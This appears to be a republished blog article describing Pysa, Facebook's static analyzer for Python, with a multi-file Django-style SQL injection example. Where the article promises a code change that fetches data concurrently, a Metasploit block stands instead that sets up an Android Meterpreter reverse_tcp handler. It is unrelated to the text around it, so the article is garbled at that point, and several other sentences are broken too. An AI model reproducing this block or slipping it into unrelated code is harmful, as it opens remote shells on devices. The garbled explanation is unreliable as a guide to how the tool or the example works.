Pysa: A Tool to Prevent Security Vulnerabilities in Python

“Pysa” is an open-source static analysis tool built by Facebook. It has been built to detect and prevent security and privacy issues in python code. Pysa is an acronym for Python Static Analyzer.

Pysa is a security-focused tool build on the top of Pyre, Facebook's type checker for python. It checks code and analyzes how data flows through it. Data flow analysis is useful because many security and privacy issues can be modeled as data flowing into a place it shouldn’t. It helps to detect a wide range of issues.

Example: When Facebook use on their python code makes use of certain internal frameworks, which is designed to prevent access or disclose on their user data based on technical privacy policies.

Pysa detects common web app security issues like SQL injection, XSS. It helps to scale application security efforts for python which is the most important codebase which powers Instagram’s servers.

How Pysa Works

Pysa was developed with the lessons learned from Zoncolan in mind. It used the same algorithm to perform analysis and even shares some code with Zoncolan. It tracks data flows through a program. The most common kinds of sources are places where user-controlled data enters the application like Django’s HttpRequest.GET dictionary. Sinks tend to be much more varied but can include APIs that execute code suck as eval to access file systems like os.open. It performs some rounds of analysis to build summaries to determine which functions have parameters that eventually reach a sink. Visualizing this process creates a tree with the issue of apex and source and sinks at the leaves.

Positives and Negatives

According to Facebook engineers, it gives some false positive and negative and they decide how to deal with it.

False positives occur when a tool reports that a security issue is present where none exists.
False negatives occur when a tool fails to detect and report when a real security issue is present.

Here are two kinds of functionality by which users can remove these false positives and negative features:

Sanitizers — During the analysis process, pysa to complete data flow after it passes through a function to attribute the allow users to encode their domain in specific knowledge about transformations that will always render data being from a security perspective.
Features — It is a little piece of metadata that can attach to flows of data as they are being tracked throughout the code. It never removes any issue from Pysa’s result.

Where Pysa is most Useful?

Imagine this code is written by a user.


# views/user.py
async def get_profile(request: HttpRequest) -> HttpResponse:
   profile = load_profile(request.GET['user_id'])
   ...
 
# controller/user.py
async def load_profile(user_id: str):
   user = load_user(user_id) # Loads a user safely; no SQL injection
   pictures = load_pictures(user.id)
   ...
 
# model/media.py
async def load_pictures(user_id: str):
   query = f"""
      SELECT *
      FROM pictures
      WHERE user_id = {user_id}
   """
   result = run_query(query)
   ...
 
# model/shared.py
async def run_query(query: str):
   connection = create_sql_connection()
   result = await connection.execute(query)
   ...

The potential SQL injection is load_pictures is not exploitable because that function will only ever receive the valid user_id that resulted from calling load_user in the load_profile function.

Then, imagine that an engineer fetching the user and picture data concurrently results faster —

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.126
set lport 4444
exploit

This change may look innocuous but ends up connecting the user-controlled user_id string directly to the SQL injection issue in load_pictures. In a large application with many layers between the entry point and database queries, this engineer might never realize that the data is fully user-controlled, or that a SQL injection issue lurks in one of the functions called.

Open-source Pysa:

Facebook makes Pysa open source to help it to find security issues. So others can use these tools for their python code. Some open-source Python frameworks such as Django and Tornedo, Pysa helps to find security issues in projects in the first run and also in record time.

Limitation —

There is no way to build a perfect static analyzer. Pysa has also some limitations based on its choice to detect security issues by data flow, together with design decisions that trade-off performance for precision and accuracy.

Previously published behind a paywall: https://centocode.com/pysa-to-detect-and-prevent-security-issues-in-python-code-1437/